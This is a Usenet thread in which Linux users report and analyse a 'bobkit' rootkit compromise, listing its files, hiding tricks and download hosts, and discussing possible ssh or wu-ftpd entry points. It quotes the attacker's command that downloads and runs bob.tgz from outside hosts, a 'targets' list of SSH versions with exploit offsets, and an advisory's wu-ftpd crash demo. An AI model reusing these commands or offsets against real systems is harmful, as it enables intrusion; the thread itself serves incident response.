Hacked by "bobkit"
Willy Angenent
I've discovered a rootkit installed on my linux computer called "bobkit". It
was exploited presumably by another ssh or wu-ftp exploit. I've only been
able to find three references to this rootkit in newsgroups. One of 'em
describes the exact same attack. the origin seems to be from dutch internet
provides where the tgz rootkits are downloaded from.
Here's a short account of what I've found out up to now:
During the ssh or wu-ftp exploit these commands were issued using a perl
script:
@commands = ("su root","cd /tmp ; rm -rf bob* ; if [ -f /usr/bin/lynx ];
then export TERM=vt100 ; /usr/bin/lynx -dump
http://dufiles.is.dreaming.org/bob.tgz >bob.tgz ; else if [ -f
/usr/bin/wget ]; then /usr/bin/wget http://dufiles.is.dreaming.org/bob.tgz ;
else if [ -f /usr/bin/ncftpget ]; then /usr/bin/ncftpget
ftp://dufiles.mine.nu/bob.tgz -P 2121 ; fi ; fi ; fi ; tar zxf bob.tgz ; cd
bob ; ./bob&");
(taken from the .bkit-war file in /usr/include/...)
I downloaded the bob.tgz file and here's what's in it:
total 36
drwxr-xr-x 2 root root 4096 Dec 21 15:49 adore
drwxr-xr-x 2 root root 4096 Jan 15 15:10 base
drwxr-xr-x 2 root root 4096 Jan 15 15:23 bin
-rwxr-xr-x 1 root users 14722 Jan 15 17:25 bob
-rw-r--r-- 1 root root 0 Jan 16 19:49 files
drwxr-xr-x 2 root root 4096 Jan 15 17:10 hax0r
drwxr-xr-x 2 root root 4096 Jan 16 19:28 lib
./adore:
total 32
-rw-r--r-- 1 root root 13475 Nov 28 2000 adore.c
-rw-r--r-- 1 root root 4336 Nov 28 2000 ava.c
-rw-r--r-- 1 root root 3118 Nov 28 2000 libinvisible.c
-rw-r--r-- 1 root root 2463 Nov 28 2000 libinvisible.h
./base:
total 24
-rwxr--r-- 1 root root 736 Jan 15 16:21 bkit-lc
-rwxr-xr-x 1 root root 11882 Dec 8 11:36 bkit-pg
-rwxr-xr-x 1 root root 1535 Dec 20 09:01 bkit-rpass
-rwxr-xr-x 1 root root 1596 Oct 25 2000 bkit-sz
./bin:
total 740
-rwxr-xr-x 1 root root 655336 Dec 22 13:26 bkit-shd
-rwxr-xr-x 1 root root 6986 Dec 13 12:37 dir
-rwxr-xr-x 1 root root 4619 Dec 14 00:06 du
-rwxr-xr-x 1 root root 4620 Dec 14 00:05 find
-rwxr-xr-x 1 root root 6122 Dec 14 00:05 ls
-rwxr-xr-x 1 root root 4612 Dec 14 00:05 lsof
-rwxr-xr-x 1 root root 4616 Dec 14 00:05 netstat
-rwxr-xr-x 1 root root 4828 Dec 14 00:06 psr
-rwxr-xr-x 1 root root 7030 Dec 13 12:37 pstree
-rwxr-xr-x 1 root root 6994 Dec 13 12:37 slocate
-rwx------ 1 root root 14885 Nov 29 2000 top
-rwxr-xr-x 1 root root 6989 Dec 13 12:37 vdir
./hax0r:
total 252
-rw-r--r-- 1 root root 626 Jan 15 15:15 bkit-ascii
-rw-r--r-- 1 root root 434 Dec 16 22:41 bkit-cfg
-rwxr-xr-x 1 root root 676 Dec 24 11:59 bkit-d
-rwxr--r-- 1 root root 308 Jan 10 14:07 bkit-dl
-rwxr-xr-x 1 root root 117956 Jan 15 15:17 bkit-f
-rwxr-xr-x 1 root root 55604 Jan 3 2001 bkit-get
-rwxr--r-- 1 root root 59 Jan 10 14:08 bkit-mc
-rwxr-xr-x 1 root root 571 Jan 14 22:50 bkit-patch
-rwx------ 1 root root 35501 Jan 15 15:08 bkit-sf
-rw-r--r-- 1 root root 407 Dec 10 09:39 bkit-shdcfg
-rw------- 1 root root 541 Dec 20 09:26 bkit-shhk
-rw-r--r-- 1 root root 51 Dec 14 01:15 proc.h
./lib:
total 76
-rwxr-xr-x 1 root root 33848 Sep 9 2000 libproc.a
In the bob script here's the maker's ID:
# BOBKit by sArGeAnt with some bins from linux rootkit 0.7 by tragedy/dor
and adore from t0rnkit 9 by t0rn
The bob script erases all traces of the breakin, replaces system
executables, modifies startup files, installs kernel modules, installes
SETI@home and several ip and portscanner type programs.
There are the traces I found on my system:
In /usr/include:
proc.h:
3 bkit-
3 sargeant
3 du-crew
3 d0wnunder
3 dufiles
file.h
.bkit-1010867046.tgz
in /usr/include/...
bk5ids
bk5ni
bk5realnm
.bkit-1010867046.tgz
bkit-binst
bkit-dl
bkit-get
.bkit-id
bkit-mc
.bkit-mf
bkit-mf
.bkit-mfclean
bkit-nmap
bkit-patch
bkit-pinst
.bkit-sar
bkit-sar
bkit-scan
bkit-screen -> /usr/bin/screen
bkit-sinst -> /bin/sleep
bkit-sleep
bkit-smr
.bkit-ss
.bkit-ssd
.bkit-ssh
bkit-ssh
.bkit-war
bkit-war
bkit-wmr
.bkit-wu
bkit-wu
core -> /dev/null
nohup.out -> /dev/null
targets
.tmp (dir)
in /usr/lib/...
bkit-ssh (dir)
du
find
ls
lsof
netstat
psr
pstree
slocate
top
uconf.inv
./bkit-ssh:
bkit-pw
bkit-shdcfg
bkit-shd.pid
bkit-shhk
bkit-shrs
in /usr/sbin/...
bkit-f
bkit-shd
And lastly in /usr/sbin/: a binary called ntpsx. This binary was called from
the /etc/rc.d init scripts.
I noticed the attack when a network monitor showed traffic which I wasn't
creating. I then noticed a strange entry from the output of the (modified)
ps command. chkrootkit warned me a possble t0rknit v8 or a LKM trojan was
installed. I tracked the kit down by using the command line 'find -name
"..."' after I guessed it was a t0rkit modification.
Here are the source urls:
ftp://dufiles.mine.nu/bob.tgz
http://dufiles.is.dreaming.org/bob.tgz
Willy Angenent
cra...@erols.com
The dates (if they are close to being accurate) indicate a relatively
old exploit. Seeing adore would also indicate a year old root-kit.
The key thing is the exploit, not the installed root-kit. You seem to
think that it is either a ssh or wu-ftp exploit; this combo would seem
to indicate a rather recent exploit that I'm not aware of. I'm seeing an
increase in ssh (22) probes that I surmise to be related to the recently
announced sshd problem.
Sorry if this reply doesn't help answer your question. However, I would
like to know if a remote exploit for sshd or wu-fftd exists.
Clyde
Row
<nos...@spamspamspamspamspamspamspamspamspam.net> wrote:
>The bob script erases all traces of the breakin, replaces system
>executables, modifies startup files, installs kernel modules, installes
>SETI@home and several ip and portscanner type programs.
Can you determine which SETI@home user it is working as? I'd be
interested is looking up the stats for work units finished...
Luke Vogel
> Sorry if this reply doesn't help answer your question. However, I would
> like to know if a remote exploit for sshd or wu-fftd exists.
You can bet your family jewels that a group of hackers have put the
newly discovered ssh and wu-ftpd exploits into an attack kit!
It would reasonably trivial to do by amending some of the code from the
worms that we have seen around in the past year or so.
I've downloaded the rootkit from the site that the OP showed in his
analysis, and I will see if the "adore" that you are talking about is in
fact a part of the worm, or if it is the adore kernel module that is
used to hide parts of the root kit.
--
Regards
Luke
------
Q: What does FAQ stand for?
A: We are Frequently Asked this Question, and we have no idea.
------
C.O.L.S FAQ - http://www.linuxsecurity.com/docs/colsfaq.html
Note: Remove NOSPAM from my return address if necessary
------
Willy Angenent
I was running Redhat 7.0 with a patched wu-ftp rpm. The only ports I had
open were ssh, ftp and apache so it has to be one of 'em. I reinstalled the
computer and cannot find out what version of openssh or wu-ftp I had. What I
can do is give you a copypaste of a file called 'targets' which was in the
/usr//include/... dir:
---
Short -
SSH-1.5-1.2.26-31+OpenSSH-1.2+1.2.2,0x08070000,0x08184000,0x00000004,0x00010
004,0x00000000,0x08400000,0x7a,0x0805,0
Short -
SSH-1.5-1.3.6_F-SECURE_SSH,0x00032004,0x083d503c,0x0002afc4,0x00010004,0x000
00000,0x08400000,0x7a,0x0805,0
Short -
SSH-1.5-1.3.7,0x0807b000,0x083f1374,0x00019004,0x00010004,0x00000000,0x08400
000,0x7a,0x0805,0
Short -
SSH-1.5-OpenSSH-1.2.3,0x0806d000,0x080725ec,0x0000c804,0x00010004,0x00000000
,0x08400000,0x7a,0x0805,0
Short -
SSH-1.99/2.99-OpenSSH_2.1.1,0x08210000,0x083f99b4,0x00000004,0x0000664c,0x00
000000,0x08400000,0x96,0x0805,0
Short -
SSH-1.99/2.99-OpenSSH_2.2.0p1,0x08180000,0x08184000,0x00000004,0x00010004,0x
00000000,0x08400000,0x96,0x0805,0
Long -
SSH-1.5-1.2.26-31+OpenSSH-1.2+1.2.2,0x08070000,0x08184000,0x00000004,0x00010
004,0x00000000,0x08400000,0x7a,0x0805,1
Long -
SSH-1.99/2.99-OpenSSH_2.2.0p1,0x080b0000,0x08184000,0x37f8c00c,0x4011000c,0x
4011000c,0x4019000c,0x96,0x0805,1
----------------------------------------------------------------------------
--------------------------------,0x080b0000,0x08184000,0x37f8c00c,0x4011000c
,0x4011000c,0x4019000c,0x96,0x0805,1
Short -
SSH-1.5-1.2.26-27-TEST,0x08080000,0x08184000,0x00000004,0x00010004,0x0000000
0,0x08400000,0x7a,0x0805,0
Short -
SSH-1.5-1.2.31-TEST,0x08089604,0x083fa9fc,0x0000c804,0x00005604,0x00000000,0
x08400000,0x7a,0x0805,0
Short -
SSH-1.99/2.99-OpenSSH_2.2.0p1-TEST,0x08070000,0x08184000,0x00000004,0x000100
04,0x00000000,0x08400000,0x96,0x0805,0
Short -
SSH-1.99/2.99-OpenSSH_2.2.0p1-TEST,0x080c0000,0x08184000,0x00000004,0x000100
04,0x00000000,0x08400000,0x96,0x0805,0
Short -
SSH-1.99/2.99-OpenSSH_2.2.0p1-TEST,0x08180000,0x08184000,0x00000004,0x000100
04,0x00000000,0x08400000,0x96,0x0805,0
Short -
SSH-1.99/2.99-OpenSSH_2.2.0p1-TEST,0x08070000,0x08184000,0x00000004,0x000100
04,0x00000000,0x08400000,0x7a,0x0805,0
Long -
SSH-1.99/2.99-OpenSSH_2.2.0p1-TEST,0x080b0000,0x08184000,0x37f8c00c,0x401100
0c,0x4011000c,0x4019000c,0x96,0x0805,1
Long -
SSH-1.99/2.99-OpenSSH_2.2.0p1-TEST,0x080c0000,0x08184000,0x37f8c00c,0x401100
0c,0x4011000c,0x4019000c,0x96,0x0805,1
Long -
SSH-1.99/2.99-OpenSSH_2.2.0p1-TEST,0x08070000,0x08184000,0x00000004,0x000100
04,0x00000000,0x08400000,0x7a,0x0805,1
Long -
SSH-1.5-1.3.7,0x0807b000,0x083f1374,0x00019004,0x00010004,0x00000000,0x08400
000,0x7a,0x0805,0
Long -
SSH-1.5-1.2.26-TEST,0x08070000,0x08184000,0x00000004,0x00010004,0x00000000,0
x08400000,0x7a,0x0805,1
Long -
SSH-1.5-1.2.27-TEST,0x08060000,0x08184000,0x37f8c00c,0x3813000c,0x4000000c,0
x4019000c,0x7A,0x0805,1
Long -
SSH-1.5-1.2.27-TEST,0x08060000,0x08184000,0x37f8c00c,0x3813000c,0x4011000c,0
x4019000c,0x72,0x0805,1
Long -
SSH-1.5-1.2.27-TEST,0x08070000,0x08184000,0x00000004,0x00010004,0x00000000,0
x08400000,0x7a,0x0805,1
Long -
SSH-1.5-1.2.30-TEST,0x08070000,0x08184000,0x00000004,0x00010004,0x00000000,0
x08400000,0x7a,0x0805,1
Long -
SSH-1.5-1.2.31-TEST,0x08070000,0x08184000,0x00000004,0x00010004,0x00000000,0
x08400000,0x7a,0x0805,1
---
I'm guessing if you have one of these ssh's, you've got a problem. You would
have to try to hack yourself with the script files if you want to feel safe.
Willy
Willy Angenent
part chkrootkit was complaning about which alerted me as well. The process
hiding is primitive though. If you use top, its very easily identifiable
there's something weird happening. And I was alerted in ps that there was
seemingly one process called "3" which constantly changed pid.
Willy Angenent
/usr/include/..., /usr/bin/... and /usr/lib/... directories and I couldn't
find any traces of it. But I checked the scripts and in the bkit-sinst file,
a file called bkit-set.tgz is downloaded from
http://dufiles.is.dreaming.org/bkit-seti.tgz
The site translates to webhop.dyndns.org, and the seti file is taken from
people.zeelandnet.nl.
In this tgz file are:
bkit-s
bkit-seti
key.sah
user_info.sah
version.sah
The user_info file gives:
type=user info
id=3367861
key=1329821647
email_addr=sarg...@du-crew.com
name=sArGeAnt
url=
country=Netherlands
postal_code=
show_name=yes
show_email=no
venue=3
register_time= 2452226.86240 (Tue Nov 13 08:41:51 2001)
last_wu_time= 0.00000
last_result_time= 0.00000
nwus=0
nresults=0
total_cpu=0.000000
params_index=0
I looked up the url and it's at:
http://setiathome.ssl.berkeley.edu/cgi-bin/cgi?email=sarg...@du-crew.com&cm
d=user_stats_new
Name (and URL) sArGeAnt
Results Received 5325
Total CPU Time 9.337 years
Average CPU Time per work unit 15 hr 21 min 35.6 sec
Last result returned:Thu Jan 17 12:44:21 2002 UTC
Registered on:Tue Nov 13 08:41:50 2001 UTC
View Registration Class
SETI@home user for:1564 hr 11 min
Your group info:
You belong to the group named: SETI@Netherlands
You are the founder of: dU-crew
Your rank: (based on current workunits received)
Your rank out of 3489701 total users is: 10025th place.
The number of users who have this rank: 2
You have completed more work units than 99.713% of our users.
cya,
Willy
Silviu Minut
> newly discovered ssh and wu-ftpd exploits into an attack kit!
>
Do you happen to know if openssh-server-2.9p2-11.7 is vulnerable? Do you
have a pointer to the ssh exploit you're talking about?
Willy Angenent
"Silviu Minut" <minu...@cps.msu.edu> wrote in message
news:3C46F402...@cps.msu.edu...
I don't know. I don't even know if the exploit I had a problem with is in
openssh or wu-ftpd.
An educated guess says I had these two installed:
wu-ftpd-2.6.1-18.i386.rpm
openssh-server-2.3.0p1-5.i386.rpm
The wu-ftpd has an exploit:
" The following (from the CORE advisory) demonstrates the existence of
this vulnerability:
ftp> open localhost
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version wu-2.6.1-18) ready.
Name (localhost:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection
1405 ? S 0:00 ftpd: accepting connections on port 21
7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd
26256 ? S 0:00 ftpd:
sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) at 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136
3136 in malloc.c
"
It looks like the wu-ftpd was the culprit.
Marc Greene
All of the ones I've seen rely on having an account on the target machine
(or at least guest access with wu-ftpd).
http://www.securiteam.com/exploits/6T00B203FC.html
References to these exploits are everywhere, try a search engine :-)
Marc
cra...@erols.com
Willy Angenent wrote:
> Clyde,
>
> I was running Redhat 7.0 with a patched wu-ftp rpm. The only ports I had
> open were ssh, ftp and apache so it has to be one of 'em. I reinstalled the
> computer and cannot find out what version of openssh or wu-ftp I had. What I
> can do is give you a copypaste of a file called 'targets' which was in the
> /usr//include/... dir:
-------big snip------------
> I'm guessing if you have one of these ssh's, you've got a problem. You would
> have to try to hack yourself with the script files if you want to feel safe.
>
> Willy
Normally I would say wu-ftp as there is an remote vulnerability that is
available (as you know). But you patched, so the likely culprit is
sshd. I'm seeing an increase in probes to port 22 on my home and work
computers. incidents.org have indicated that most of the probes for 22
seem to be coming from Asia.
One point. If it is sshd, then you might want to block it using a
firewall *and* /etc/hosts.deny.
The network security gurus at work have been hammering the masses about
upgrading sshd.
Clyde
Row
I've had two computers cranking away on SETI for a couple of years
now, and I'm only in the 97th percentile. Seems obvious that some of
his work units come from cracked machines. Wonder if the SETI people
have any record of IP addresses for returned work units? Maybe it'd
piss him off if they just removed his stats!
Willy Angenent
"Row" <r...@column.com> wrote in message
news:pj6f4uo51jtr55qqc...@4ax.com...
Jonathan Ross
> Hi fellow linux users,
>
> I've discovered a rootkit installed on my linux computer called "bobkit". It
> was exploited presumably by another ssh or wu-ftp exploit. I've only been
> able to find three references to this rootkit in newsgroups. One of 'em
> describes the exact same attack. the origin seems to be from dutch internet
> provides where the tgz rootkits are downloaded from.
>
//snip
Hi,
yesterday I discovered the same rootkit on my RedHat 6.2 box. I too
had wu-ftp patches, so I think the hacker exploited Sshd -- I have
heard there are exploits for sshd 1 and 2, and am kicking myself for
not installing sshd 3 ages ago.
It seems that the rootkit was on my system for a month... aagh! I was
too busy to check system logs or fix security holes.
The signatures I encountered were similar to the ones you reported:
(apparantly) the seti@home program was taking a lot of cpu. Sshd had
been replaced, and there were public and private keys in
/usr/lib/security/.bkit-s/ssh or somewhere like that (I am not at my
machine now, so I can't find the exact path...)
I also found some curious messages in my system log (something like
'SSHD: your version of sshd is way too old and no longer supported.').
Another noteworthy thing was some hidden files in /tmp (I will post
content on some other occasion), and the apparent use of uucp, nfslock
and other services.
What I really want now, is to find out who is doing this! You say you
think the person is operating from Holland? Any more clues? Perhaps
they were launching attacks from my system even?
Please get in touch, maybe we can get to the bottom of this together.
Jonathan Ross.
Dzuy
I've found a /usr/bin/ntpsx lineat the end of my rc.local file on my (RH7.1)
homemade firewall. A search on the newsgroup leads me to this article. I too
see a process named "3" that keeps changing PID. I can't seem to be able to
download the kit to see what's in it and what it does.
Seems like a new hack. My machine was infected sometime last week. Expect to
hear more about it soon?
"Willy Angenent" <nos...@spamspamspamspamspamspamspamspamspam.net> wrote in message news:<a24k4g$6lb$1...@reader08.wxs.nl>...
a
A co-workers RH 7.1 box was cracked and had "bkit" (BoBKit) installed
as well as a DoS tool (tribal flood). Looks like they got in through another
wu-ftpd exploit. This was the original version off the RH 7.1 distro CD.
Patch patch patch.
There were a bunch of process control files in /tmp that defined what to
filter
from netstat and ps.
The kits where installed in
/usr/lib/.../
/usr/sbin/.../
/usr/include/.../
There was a partially encrypted log file in /var/log called "pacc" or
somehting .
A trojan SSH v1 client (downund3r) was installed an listening on port 4545.
There was a process "3" running which is somehow related.
The file /usr/sbin/ntpsx started the trojan servers which was called by
/etc/rc.d/rc.local on startup.
In this case the SSH trojan was named "bkit-sd" and the tribal flood DoS
tool was "bkit-f"
On a side note, chkrootkit easily detected a compromise, even with many of
the
trojaned system binaries in place. FYI
JC
"Dzuy" <dz...@my-deja.com> wrote in message
news:eb77e186.02012...@posting.google.com...
Reinier Post
>
>A co-workers RH 7.1 box was cracked and had "bkit" (BoBKit) installed
>as well as a DoS tool (tribal flood). Looks like they got in through another
>wu-ftpd exploit. This was the original version off the RH 7.1 distro CD.
>Patch patch patch.
wu-ftpd is one of those programs that has been known for its security
holes ever since it existed. If you care about security, better switch
to a different ftpd.
--
Reinier
Markus Schabel
"Reinier Post" <r...@win.tue.nl> schrieb im Newsbeitrag
news:a314d7$kii$2...@news.tue.nl...
which would be the best?
greetz markus
Jem Berkes
>> holes ever since it existed. If you care about security, better
>> switch to a different ftpd.
>
> which would be the best?
I've heard a lot of good things about proftpd (www.proftpd.net) and I also
use it myself. However, there are many smaller and equally secure servers
around that have features, and are not as hard to set up. Check out
freshmeat.net
Johan Kiviniemi
> > which would be the best?
> I've heard a lot of good things about proftpd (www.proftpd.net) and I also
> use it myself.
Plain FTP is never secure. Consider using SFTP, FTP over SSH, FTP over SSL or
something like that..
For anonymous FTP, vsftpd might be good.
--
Johan Kiviniemi ion at hassers.org http://ion.amigafin.org/
Matthew Goldman
> which would be the best?
>
> greetz markus
>
ProFTPD [1] is an excellent open source server, with Apache [2] style
config. Otherwise, check out a variety[3] just to see.
--Matthew
[1]http://www.proftpd.net/
[2]http://httpd.apache.org/
[3]http://directory.google.com/Top/Computers/Software/Internet/Servers/FTP/